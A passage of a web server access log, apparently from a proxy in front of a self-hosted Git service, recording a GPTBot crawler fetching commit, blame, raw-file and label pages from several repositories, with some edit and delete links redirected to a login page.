"/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11016] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:57:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11015] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:57:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11014] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:57:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11765] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md" -[17/Feb/2026:16:57:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/projects?q=&sort=oldest&state=open" [Client 74.7.227.38] [Length 7809] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/projects" -[17/Feb/2026:16:57:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=name&state=open" [Client 74.7.227.38] [Length 8493] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones" -[17/Feb/2026:16:57:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?files=html%2fpages%2fDCS.html" [Client 74.7.227.38] [Length 30638] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" -[17/Feb/2026:16:57:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11220] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:57:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:57:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11219] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:57:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json" -[17/Feb/2026:16:57:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:57:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:57:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:57:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72042] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:57:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72043] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:57:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72040] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:57:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:57:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:57:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10172] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:57:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11236] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:57:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10173] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:57:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:57:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:57:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:57:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json" -[17/Feb/2026:16:57:23 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/components/Header.tsx" -[17/Feb/2026:16:57:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.html" -[17/Feb/2026:16:57:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/index.html" -[17/Feb/2026:16:57:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/labels?sort=alphabetically&state=" [Client 74.7.227.38] [Length 7631] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/labels" -[17/Feb/2026:16:57:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip?display=source" [Client 74.7.227.38] [Length 11565] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:16:57:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip?display=source" [Client 74.7.227.38] [Length 11559] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:16:57:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 11066] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" -[17/Feb/2026:16:57:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 9809] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libssl-3-x64.dll" -[17/Feb/2026:16:57:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fMakefile.cmake" [Client 74.7.227.38] [Length 29054] [Gzip 6.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:57:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fprogress.marks" [Client 74.7.227.38] [Length 24630] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:57:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2fMakefile2" [Client 74.7.227.38] [Length 26952] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:57:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/labels?sort=alphabetically&state=" [Client 74.7.227.38] [Length 7656] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/labels" -[17/Feb/2026:16:57:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/Dockerfile?display=source" [Client 74.7.227.38] [Length 11802] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/Dockerfile" -[17/Feb/2026:16:57:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56432] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md" -[17/Feb/2026:16:57:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56429] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md" -[17/Feb/2026:16:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481684] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md" -[17/Feb/2026:16:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56430] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md" -[17/Feb/2026:16:57:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" -[17/Feb/2026:16:57:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/libcrypto-3-x64.dll" -[17/Feb/2026:16:57:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" -[17/Feb/2026:16:57:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/libcrypto-3-x64.dll" -[17/Feb/2026:16:57:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 9812] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" -[17/Feb/2026:16:57:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 5813273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" -[17/Feb/2026:16:57:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 882] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" -[17/Feb/2026:16:57:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481685] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 